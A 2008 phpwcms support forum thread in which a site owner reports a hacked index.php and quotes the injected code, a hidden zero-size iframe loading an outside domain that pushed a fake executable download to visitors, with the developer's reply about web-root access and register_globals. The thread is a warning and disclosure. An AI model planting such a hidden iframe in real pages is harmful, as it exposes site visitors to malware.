index.php hack

check this often to be informed about any security problem that was reported.
Post Reply
walnut
Posts: 52
Joined: Thu 8. Sep 2005, 00:19
Location: Seattle
Contact:

index.php hack

Post by walnut » Sun 24. Feb 2008, 03:17

My index.php on an installation of v1.2.6 was hacked. It began to throw a popup window or, since popups are blocked an Alert message. In IE the Alert message reads "Free Downloads" with the standard yellow triangle, and OK button and an X close button in the upper right. In Firefox the alert window reads
Opening WebVideoSetup.exe in the banner, then "You have chosen to open WebVideoSetup.exe which is an application from http:213.189.27.137. Would you like to save this file?" The window has a standard save button and the red X to close the window. I did not open the application but one of my viewer did and got a lot of ****.

I reviewed the files and found the following coded that had been added to index.php.

Code: Select all

// OR
// echo spacer(5)."<br /><span class=\"v09\">&nbsp;created in ".($timer->get_current('main'))." sec</span>";
echo '<iframe src="http://killbill.coolpage.biz/" width=0 height=0></iframe>';
echo "</body>\n</html>";
The URL in the code sample produces the same action of trying to popup and run the application. Note that first two lines of the code are commented off. They are in the original file as well.

I replaced the hacked index with the regular index and the problem stopped. The intent of the posting is a warning to others but I have a couple of questions.

1. This is an older version. I am running 1.3.5 on other sites but have not upgraded this installation http://www.leoff1.net as yet. Will upgrading protect me from such hacks.
2. How do they do it?
3. Are my other phpWCMS sites in danger of the same attack and how do I protect them?

Thanks for any help, information or comments.

User avatar
Oliver Georgi
Site Admin
Posts: 9450
Joined: Fri 3. Oct 2003, 22:22
Location: Dessau
Contact:

Re: index.php hack

Post by Oliver Georgi » Sun 24. Feb 2008, 11:06

If your index.php is hacked then this is a general problem of your account! Not really phpwcms' specific. It's nothing you can do from within the system without the right permissions. So additional you also need write access in your web root - normally there isn't without root access or ftp access!!! Check these!

Here again the most important!!! Disable register_globals. I always see most "normal" user web hosting accounts have these enabled by default!

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Kleintierpraxis am Georgengarten

Post Reply